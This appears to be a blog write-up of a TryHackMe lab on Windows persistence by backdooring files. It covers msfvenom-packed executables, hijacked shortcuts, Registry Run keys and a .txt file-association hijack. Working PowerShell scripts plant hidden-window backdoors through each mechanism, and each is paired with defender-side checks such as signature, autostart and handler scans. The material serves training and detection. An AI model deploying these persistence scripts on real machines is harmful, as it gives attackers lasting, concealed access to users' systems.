Introduction
This post covers the second part of the Windows persistence techniques series, backdooring files, as part of the TryHackMe Windows Local Persistence room.
Another method of establishing persistence consists of tampering with some files we know the user interacts with regularly. By performing some modifications to such files, we can plant backdoors that will get executed whenever the user accesses them. Since we don’t want to create any alerts that could blow our cover, the files we alter must keep working for the user as expected.
While there are many opportunities to plant backdoors, we will check the most commonly used ones.
- Executable Files
- Shortcut Files
- Hijacking File Associations
- Startup Scripts
Method 1: Packing Executables with Payloads
Attackers often try to sneak past defenses by hiding malicious code inside everyday programs. One way to do this is to use msfvenom to wrap a reverse shell inside a common executable such as calc.exe, using the original binary as a template (msfvenom's -x option) and keeping its normal behaviour (-k). When the file runs, it opens the Calculator as usual, so everything looks normal on the surface. Behind the scenes it also reaches out to the attacker's system and quietly opens a connection.
To avoid getting caught by antivirus software, attackers try tricks such as encoding the payload or running it through several layers of obfuscation, using flags like -e to pick an encoder and -i to apply it for several iterations. The goal is to make the malicious part of the file harder for antivirus tools to recognise. Keep in mind that msfvenom encoders exist to avoid bad characters in the payload, not to defeat AV, and the decoder stub they prepend is itself well known to signature engines.
Even with these techniques, it’s a hit-or-miss game. When tested on VirusTotal—a site that checks files against dozens of antivirus engines—these packed executables often still get flagged. Detection rates remain high unless the attacker uses more advanced methods or adds other tools to hide the code better.
So, while this method gets the job done in basic setups or against outdated defenses, it doesn’t hold up well against modern security layers without serious tweaks. It’s noisy and risky—fine for a quick test or amateur attack, but not ideal if stealth is a priority.
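A check a defender can run against the technique above, as an added example that is not part of the original post or the TryHackMe room: any payload injected into a template with msfvenom changes the file's bytes, so the result no longer matches the Windows signature or the pristine copy in System32, no matter which encoder or how many iterations were used. The suspect path is a hypothetical placeholder.

```powershell
# Added example (not from the original post): verify a Windows binary that may
# have been rebuilt from a signed template. Stock Windows executables are
# catalog-signed, so Get-AuthenticodeSignature reports Valid for the original
# and anything else (NotSigned, HashMismatch) for a modified copy.
# Assumption (hypothetical path): the suspect copy is C:\Users\Public\calc.exe.
$Suspect  = 'C:\Users\Public\calc.exe'
$Pristine = Join-Path $env:SystemRoot 'System32\calc.exe'

function Test-BinaryIntegrity {
    param([string]$Path, [string]$Reference)

    $sig     = Get-AuthenticodeSignature -FilePath $Path
    $hash    = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    $refHash = (Get-FileHash -Path $Reference -Algorithm SHA256).Hash

    [pscustomobject]@{
        Path             = $Path
        SignatureStatus  = $sig.Status                  # Valid on a stock binary
        Signer           = $sig.SignerCertificate.Subject
        MatchesReference = ($hash -eq $refHash)
        Suspicious       = ($sig.Status -ne 'Valid') -or ($hash -ne $refHash)
    }
}

Test-BinaryIntegrity -Path $Suspect -Reference $Pristine | Format-List

# Sweep user-writable locations for executables without a valid signature; a
# "calc.exe" sitting on a desktop that is not signed is exactly what a packed
# template looks like.
Get-ChildItem -Path 'C:\Users\*\Desktop\*.exe', 'C:\Users\Public\*.exe' -ErrorAction SilentlyContinue |
    ForEach-Object { Get-AuthenticodeSignature -FilePath $_.FullName } |
    Where-Object { $_.Status -ne 'Valid' } |
    Select-Object Path, Status
```

Encoding and obfuscation change how the payload looks to a signature scanner; they cannot restore a signature that the tampering broke, which is why signature and hash checks catch this long after AV heuristics have been evaded.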
Method 2: Shortcut Hijacking
Shortcut files, the .lnk files you see on your desktop or in the Start menu, don't get much attention. But that's exactly why attackers like them: they're small, familiar, and easy to tweak.
Instead of linking straight to a trusted app like Word or Chrome, the attacker changes the shortcut's target to powershell.exe, passing a script as its argument and asking for a hidden window. That script does two things: it starts a hidden backdoor and then launches the real application the user expected. The shortcut's icon is set back to the original program's so nothing looks different on the desktop. When the user clicks it, everything seems normal: the app opens and nothing looks off, but in the background the machine is reaching out to an attacker-controlled server.
No error messages. No weird popups. Just a quiet connection and an open door.
It’s simple and sneaky. The setup doesn’t need deep skills or fancy tools, and it blends right in with everyday use. Plus, because users rarely look twice at shortcuts, this method often flies under the radar. It’s a low-effort way for attackers to stay in the system without setting off alarms.
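The shortcut hijack described above, as an added example that is not part of the original post or the TryHackMe room, followed by the check a defender would run. The shortcut path, backdoor path and wrapper path are hypothetical placeholders; the backdoor is assumed to be an executable already staged on the host.

```powershell
# Added example (not from the original post): repoint a desktop shortcut at a
# hidden PowerShell wrapper that starts a backdoor and then the real program.
# Assumptions (all hypothetical): the shortcut is C:\Users\Public\Desktop\calc.lnk,
# the backdoor is a staged executable at C:\Windows\Temp\backdoor.exe, and the
# wrapper is written to C:\Windows\System32\backdoor.ps1 (admin rights needed
# for that location).
$ShortcutPath = 'C:\Users\Public\Desktop\calc.lnk'
$BackdoorPath = 'C:\Windows\Temp\backdoor.exe'
$WrapperPath  = 'C:\Windows\System32\backdoor.ps1'
$PowerShell   = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut($ShortcutPath)

# Remember what the shortcut really pointed at; the wrapper must still open it.
$OriginalTarget = $lnk.TargetPath
$OriginalArgs   = $lnk.Arguments
$OriginalIcon   = $lnk.IconLocation
# A shortcut with no explicit icon reports ",0" and borrows the target's icon;
# once the target is powershell.exe that icon would change, so pin the old one.
if ($OriginalIcon -eq ',0') { $OriginalIcon = "$OriginalTarget,0" }

# The wrapper: backdoor first (no window), then the genuine application.
$WrapperBody = @'
Start-Process -FilePath '__BACKDOOR__' -WindowStyle Hidden
Start-Process -FilePath '__TARGET__' __ARGS__
'@
$ArgClause = if ($OriginalArgs) { "-ArgumentList '$OriginalArgs'" } else { '' }
$WrapperBody.Replace('__BACKDOOR__', $BackdoorPath).Replace('__TARGET__', $OriginalTarget).Replace('__ARGS__', $ArgClause) |
    Set-Content -Path $WrapperPath -Encoding ASCII

$lnk.TargetPath   = $PowerShell
$lnk.Arguments    = "-WindowStyle Hidden -ExecutionPolicy Bypass -File `"$WrapperPath`""
$lnk.IconLocation = $OriginalIcon
$lnk.Save()

# Defender-side check: shortcuts in user-facing locations whose target is a
# script host rather than an application deserve a second look.
function Get-SuspiciousShortcuts {
    $wsh = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path 'C:\Users\*\Desktop\*.lnk',
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\*.lnk" -ErrorAction SilentlyContinue |
        ForEach-Object {
            $s = $wsh.CreateShortcut($_.FullName)
            if ($s.TargetPath -match 'powershell|cmd\.exe|wscript|cscript|mshta') {
                [pscustomobject]@{ Shortcut = $_.FullName; Target = $s.TargetPath; Arguments = $s.Arguments }
            }
        }
}
Get-SuspiciousShortcuts | Format-Table -AutoSize
```

The icon fix-up is the detail that usually gets forgotten: without it the shortcut silently acquires the PowerShell icon, which is the one visible tell a user might notice. On the defensive side, a .lnk whose TargetPath is powershell.exe with -WindowStyle Hidden is a strong indicator on its own, regardless of what the script does.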
Method 3: Startup Scripts (Registry Run Key)
One of the fastest ways to make sure a script runs every time a user logs on? Tweak the Windows registry.
Attackers often go straight for the HKLM\Software\Microsoft\Windows\CurrentVersion\Run key. By adding a new string value there, they can point Windows to any script or program they want. At each logon Windows reads this key and launches every command listed in it. Writing under HKLM needs administrative rights and affects every user on the machine; the HKCU equivalent needs only the current user's rights and fires for that user alone. The RunOnce keys beside them behave the same way but are cleared after a single use, and dropping a file into the user's or the common Startup folder achieves the same effect from the file system.
This trick is simple but powerful. It doesn't take a lot of skill to pull off, and it's especially useful for script-based payloads like PowerShell or batch files. Once in place, the script fires up at every logon, keeping the attacker connected or the malicious behavior running without the need to re-infect the system.
Because it's built into how Windows handles startup programs, this method often goes unnoticed unless someone is actively monitoring registry changes or reviewing autostart entries (Sysinternals Autoruns lists them, and Sysmon can log the value being written). That makes it a favorite move for malware that wants to stick around quietly and reliably.
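The Run key technique above, as an added example that is not part of the original post or the TryHackMe room, together with an enumeration of the same autostart locations the way a defender would read them. The script path and the value name are hypothetical placeholders.

```powershell
# Added example (not from the original post): register a logon-time backdoor via
# the Run key, then list every Run/RunOnce value and Startup-folder item.
# Assumptions (hypothetical): the wrapper script is C:\Windows\Temp\backdoor.ps1
# and the value name is chosen to look like a benign component.
$Script     = 'C:\Windows\Temp\backdoor.ps1'
$ValueName  = 'SecurityHealthCheck'
$PowerShell = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$Command    = "`"$PowerShell`" -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$Script`""

# HKLM\...\Run fires for every user who logs on but needs an elevated token;
# HKCU\...\Run needs only the current user's rights and fires for that user.
$IsAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(
    [Security.Principal.WindowsBuiltInRole]::Administrator)
$RunKey = if ($IsAdmin) { 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run' }
          else          { 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' }

New-ItemProperty -Path $RunKey -Name $ValueName -Value $Command -PropertyType String -Force | Out-Null

# Defender-side enumeration of the logon autostart locations.
function Get-AutostartEntries {
    $keys = @(
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Properties the registry provider adds to every item; everything else is a value.
    $providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        (Get-ItemProperty -Path $k).PSObject.Properties |
            Where-Object { $_.Name -notin $providerProps } |
            ForEach-Object { [pscustomobject]@{ Location = $k; Name = $_.Name; Command = $_.Value } }
    }
    # Files in the per-user and common Startup folders run at logon as well.
    foreach ($dir in [Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup')) {
        Get-ChildItem -Path $dir -File -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Location = $dir; Name = $_.Name; Command = $_.FullName } }
    }
}

# Script hosts with hidden windows, or anything launched from a Temp directory,
# are the entries worth triaging first.
Get-AutostartEntries |
    Where-Object { $_.Command -match 'powershell|cmd\.exe|wscript|cscript|mshta|rundll32|\\Temp\\' } |
    Format-Table -AutoSize
```

The admin check uses the process token's elevation state rather than raw group membership, so a member of Administrators running an unelevated shell correctly falls back to HKCU instead of failing on the HKLM write.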
Method 4: File Association Hijacking
One of the sneakiest ways attackers hold onto access is by messing with how Windows opens files. They don’t go after the files themselves—they target the rules Windows uses to decide how to open them.
It works like this: the attacker changes a registry setting tied to a common file extension, something harmless like .txt. Normally, double-clicking a .txt file launches Notepad. With this trick the file still opens in Notepad, but only after something else has run first.
Behind the scenes, the command Windows runs for that file type has been switched. In the registry the extension key (HKLM\Software\Classes\.txt) maps to a ProgID (txtfile on a stock install), and that ProgID's shell\open\command value holds the command line Windows executes, with %1 standing for the clicked file. Point that value at a script and, whenever a user opens a text file, the script runs instead: it quietly starts the backdoor, then opens the file in Notepad exactly as before. No error messages, no delays, just business as usual from the user's point of view.
Because this relies on regular activity—something as simple as opening a text file—it’s almost invisible. There’s no shortcut to inspect, no strange pop-up. It blends right in with how people use their machines every day, which is exactly what makes it so effective.
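The file association hijack described above, as an added example that is not part of the original post or the TryHackMe room, with a check that resolves the open command for a few extensions the way Windows does. The wrapper path and backdoor path are hypothetical placeholders.

```powershell
# Added example (not from the original post): hijack the handler for .txt so
# opening any text file starts a backdoor and then the original handler.
# Assumptions (hypothetical): the wrapper is written to C:\Windows\Temp\open-txt.ps1
# and the backdoor is a staged executable at C:\Windows\Temp\backdoor.exe.
# Editing HKLM\Software\Classes requires administrative rights.
$Ext      = '.txt'
$Wrapper  = 'C:\Windows\Temp\open-txt.ps1'
$Backdoor = 'C:\Windows\Temp\backdoor.exe'

# Extension key -> ProgID (txtfile on a stock install) -> shell\open\command,
# whose default value is the command line with %1 standing for the clicked file.
$ProgId      = (Get-ItemProperty -Path "HKLM:\Software\Classes\$Ext").'(default)'
$CmdKey      = "HKLM:\Software\Classes\$ProgId\shell\open\command"
$OriginalCmd = (Get-ItemProperty -Path $CmdKey).'(default)'   # e.g. %SystemRoot%\system32\NOTEPAD.EXE %1

# Pull the handler executable out of the command line so the wrapper can still
# hand the file to it; strip the trailing %1 (quoted or not) and expand variables.
$Handler = [Environment]::ExpandEnvironmentVariables((($OriginalCmd -replace '\s*"?%1"?\s*$', '').Trim('"')))

# Wrapper: $Path arrives as the clicked file; start the backdoor silently, then
# open the file with the original handler so the user sees nothing unusual.
$WrapperBody = @'
param([string]$Path)
Start-Process -FilePath '__BACKDOOR__' -WindowStyle Hidden
Start-Process -FilePath '__HANDLER__' -ArgumentList ('"' + $Path + '"')
'@
$WrapperBody.Replace('__BACKDOOR__', $Backdoor).Replace('__HANDLER__', $Handler) |
    Set-Content -Path $Wrapper -Encoding ASCII

$PowerShell = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$NewCmd = "`"$PowerShell`" -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$Wrapper`" `"%1`""
Set-ItemProperty -Path $CmdKey -Name '(default)' -Value $NewCmd

# Defender-side check: resolve the open command for common extensions through the
# same HKCU-then-HKLM order Windows merges into HKCR, and flag script hosts.
function Get-OpenCommand {
    param([string]$Extension)
    foreach ($root in 'HKCU:\Software\Classes', 'HKLM:\Software\Classes') {
        $extKey = Join-Path $root $Extension
        if (-not (Test-Path $extKey)) { continue }
        $id = (Get-ItemProperty -Path $extKey).'(default)'
        if (-not $id) { continue }
        $cmdKey = Join-Path $root "$id\shell\open\command"
        if (Test-Path $cmdKey) {
            return [pscustomobject]@{
                Extension = $Extension
                ProgId    = $id
                Source    = $root
                Command   = (Get-ItemProperty -Path $cmdKey).'(default)'
            }
        }
    }
}

'.txt', '.pdf', '.jpg', '.docx' | ForEach-Object { Get-OpenCommand $_ } |
    Where-Object { $_.Command -match 'powershell|cmd\.exe|wscript|cscript|mshta' } |
    Format-Table -AutoSize
```

One caveat for both sides: a per-user default set through the Windows UI is stored under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\<ext>\UserChoice and takes precedence over the Classes keys, so on a machine where the user has picked their own text editor the HKLM change above is never consulted, and the check needs to resolve that ProgID as well.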
Practical Demos and Flag Extraction
All these methods aren't just theory: they're played out step by step on a TryHackMe virtual machine. Each one is demonstrated live, showing exactly how the backdoor is placed, triggered, and confirmed. The goal is to grab the flags that prove the system has been compromised.
But it’s not just about getting in. There’s a focus on stealth too. Every time a payload runs, it’s tested not only to see if it works but also to check how it affects the system’s behavior. If anything looks off or interrupts the usual flow for the user, that method gets adjusted or scrapped. The idea is to keep things looking normal while the attack unfolds quietly in the background.
They also pay close attention to how antivirus tools respond. Some payloads get flagged immediately, while others slip through. This helps the attacker tweak things—like adding obfuscation or changing the delivery method—to avoid detection.
The overall approach is methodical. Each backdoor gets validated, not just technically, but in how well it hides. It’s about staying in without setting off alarms.